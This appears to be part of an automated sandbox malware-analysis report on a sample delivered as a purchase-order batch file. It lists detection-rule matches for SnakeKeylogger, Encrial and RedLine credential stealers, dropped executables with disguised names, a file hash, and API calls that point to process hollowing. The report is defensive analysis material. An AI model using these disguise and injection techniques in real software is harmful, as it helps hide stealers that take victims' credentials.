Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 23.1.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 18.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 23.2.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 18.2.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 18.2.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 23.2.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 18.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.1.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000012.00000001.2160139244.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000012.00000002.2270156460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000017.00000001.2249245726.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000017.00000002.2359070635.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Microsofts.exe PID: 6004, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth

.NET source code contains very large strings

Source: Trading_AIBot.exe.7.dr, cfRDgxIJtEfCD.cs	Long String: Length: 17605
Source: 7.2.rpkhzpuO.pif.25b4a208.7.raw.unpack, cfRDgxIJtEfCD.cs	Long String: Length: 17605
Source: 7.2.rpkhzpuO.pif.25b5b664.8.raw.unpack, cfRDgxIJtEfCD.cs	Long String: Length: 17605
Source: 7.2.rpkhzpuO.pif.25b38dc4.9.raw.unpack, cfRDgxIJtEfCD.cs	Long String: Length: 17605

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

File dump: apihost.exe.8.dr 665670656

Jump to dropped file

Found large BAT file

Source: PO#5_Tower_049.bat

Static file information: 1243067

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D8254 NtReadVirtualMemory,	4_2_027D8254
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D84C4 NtUnmapViewOfSection,	4_2_027D84C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027DDA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,	4_2_027DDA44
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027DDACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,	4_2_027DDACC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027DDBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	4_2_027DDBB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D8BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_027D8BB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D79B4 NtAllocateVirtualMemory,	4_2_027D79B4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D7D00 NtWriteVirtualMemory,	4_2_027D7D00
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D8BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_027D8BAE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027DD9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,	4_2_027DD9F0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D79B2 NtAllocateVirtualMemory,	4_2_027D79B2
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 14_2_02848254 NtReadVirtualMemory,	14_2_02848254
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 14_2_028484C4 NtUnmapViewOfSection,	14_2_028484C4
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 14_2_0284DACC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	14_2_0284DACC
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 14_2_0284DA44 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	14_2_0284DA44
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 14_2_02848BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	14_2_02848BB0
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 14_2_0284DBB0 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	14_2_0284DBB0
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 14_2_028479B4 NtAllocateVirtualMemory,	14_2_028479B4
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 14_2_02847D00 NtWriteVirtualMemory,	14_2_02847D00
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 14_2_02848BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	14_2_02848BAE
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 14_2_028479B2 NtAllocateVirtualMemory,	14_2_028479B2
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 14_2_0284D9F0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	14_2_0284D9F0
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 20_2_02818254 NtReadVirtualMemory,	20_2_02818254
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 20_2_028184C4 NtUnmapViewOfSection,	20_2_028184C4
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 20_2_0281DACC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	20_2_0281DACC
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 20_2_0281DA44 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	20_2_0281DA44
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 20_2_02818BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	20_2_02818BB0
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 20_2_0281DBB0 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	20_2_0281DBB0
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 20_2_028179B4 NtAllocateVirtualMemory,	20_2_028179B4
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 20_2_02817D00 NtWriteVirtualMemory,	20_2_02817D00
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 20_2_02818BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	20_2_02818BAE
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 20_2_028179B2 NtAllocateVirtualMemory,	20_2_028179B2
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 20_2_0281D9F0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	20_2_0281D9F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_027D85DC CreateProcessAsUserW,

4_2_027D85DC

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027C20C4	4_2_027C20C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_00408C60	7_2_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_0040DC11	7_2_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_00407C3F	7_2_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_00418CCC	7_2_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_00406CA0	7_2_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_004028B0	7_2_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_0041A4BE	7_2_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_00418244	7_2_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_00401650	7_2_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_00402F20	7_2_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_004193C4	7_2_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_00418788	7_2_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_00402F89	7_2_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_00402B90	7_2_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_004073A0	7_2_004073A0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_25681020	7_2_25681020
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_25681030	7_2_25681030
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_00408C60	7_1_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_0040DC11	7_1_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_00407C3F	7_1_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_00418CCC	7_1_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_00406CA0	7_1_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_004028B0	7_1_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_0041A4BE	7_1_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_00418244	7_1_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_00401650	7_1_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_00402F20	7_1_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_004193C4	7_1_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_00418788	7_1_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_00402F89	7_1_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_00402B90	7_1_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_004073A0	7_1_004073A0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_02D027B9	9_2_02D027B9
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_02D0C530	9_2_02D0C530
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_02D09480	9_2_02D09480
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_02D0C521	9_2_02D0C521
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_02D02DD1	9_2_02D02DD1
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_02D0946F	9_2_02D0946F
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A36138	9_2_05A36138
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3BC60	9_2_05A3BC60
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3AF00	9_2_05A3AF00
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A389E0	9_2_05A389E0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A38588	9_2_05A38588
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A34520	9_2_05A34520
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3450F	9_2_05A3450F
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A38579	9_2_05A38579
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A37428	9_2_05A37428
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A37418	9_2_05A37418
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3F448	9_2_05A3F448
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3F458	9_2_05A3F458
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3E740	9_2_05A3E740
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3E750	9_2_05A3E750
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A35680	9_2_05A35680
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3566F	9_2_05A3566F
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3E180	9_2_05A3E180
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A38120	9_2_05A38120
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3612B	9_2_05A3612B
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A38130	9_2_05A38130
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3F000	9_2_05A3F000
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A313A8	9_2_05A313A8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A30320	9_2_05A30320
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A30330	9_2_05A30330
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A35228	9_2_05A35228
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3521B	9_2_05A3521B
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A34DC0	9_2_05A34DC0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A34DD0	9_2_05A34DD0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A37CC8	9_2_05A37CC8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A30CD8	9_2_05A30CD8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A37CD8	9_2_05A37CD8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3EFF0	9_2_05A3EFF0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A36FC3	9_2_05A36FC3
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A36FD0	9_2_05A36FD0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A389D0	9_2_05A389D0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A34969	9_2_05A34969
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A34978	9_2_05A34978
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3F8A1	9_2_05A3F8A1
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3F8B0	9_2_05A3F8B0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A37880	9_2_05A37880
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A37871	9_2_05A37871
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3EBA8	9_2_05A3EBA8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A3EB98	9_2_05A3EB98
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A30AB8	9_2_05A30AB8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A35ACB	9_2_05A35ACB
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 9_2_05A35AD8	9_2_05A35AD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0318B490	10_2_0318B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0318B470	10_2_0318B470
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 14_2_028320C4	14_2_028320C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_00408C60	18_2_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_0040DC11	18_2_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_00407C3F	18_2_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_00418CCC	18_2_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_00406CA0	18_2_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_004028B0	18_2_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_0041A4BE	18_2_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_00418244	18_2_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_00401650	18_2_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_00402F20	18_2_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_004193C4	18_2_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_00418788	18_2_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_00402F89	18_2_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_00402B90	18_2_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_004073A0	18_2_004073A0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_1D641022	18_2_1D641022
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_1D641030	18_2_1D641030
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_20C147A8	18_2_20C147A8
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_20C147B8	18_2_20C147B8
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_00408C60	18_1_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_0040DC11	18_1_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_00407C3F	18_1_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_00418CCC	18_1_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_00406CA0	18_1_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_004028B0	18_1_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_0041A4BE	18_1_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_00418244	18_1_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_00401650	18_1_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_00402F20	18_1_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_004193C4	18_1_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_00418788	18_1_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_00402F89	18_1_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_00402B90	18_1_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_004073A0	18_1_004073A0
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 20_2_028020C4	20_2_028020C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_00408C60	23_2_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_0040DC11	23_2_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_00407C3F	23_2_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_00418CCC	23_2_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_00406CA0	23_2_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_004028B0	23_2_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_0041A4BE	23_2_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_00418244	23_2_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_00401650	23_2_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_00402F20	23_2_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_004193C4	23_2_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_00418788	23_2_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_00402F89	23_2_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_00402B90	23_2_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_004073A0	23_2_004073A0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_2DB61030	23_2_2DB61030
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_2DB61020	23_2_2DB61020
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_311847B8	23_2_311847B8
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_311847A8	23_2_311847A8
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_00408C60	23_1_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_0040DC11	23_1_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_00407C3F	23_1_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_00418CCC	23_1_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_00406CA0	23_1_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_004028B0	23_1_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_0041A4BE	23_1_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_00418244	23_1_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_00401650	23_1_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_00402F20	23_1_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_004193C4	23_1_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_00418788	23_1_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_00402F89	23_1_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_00402B90	23_1_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_004073A0	23_1_004073A0

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\rpkhzpuO.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C

Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: String function: 0283480C appears 619 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: String function: 0280480C appears 619 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: String function: 028046A4 appears 154 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: String function: 028487A0 appears 48 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: String function: 028346A4 appears 154 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: String function: 028187A0 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 027C46A4 appears 244 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 027C44D0 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 027C44AC appears 73 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 027D8824 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 027C480C appears 931 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 027D87A0 appears 54 times
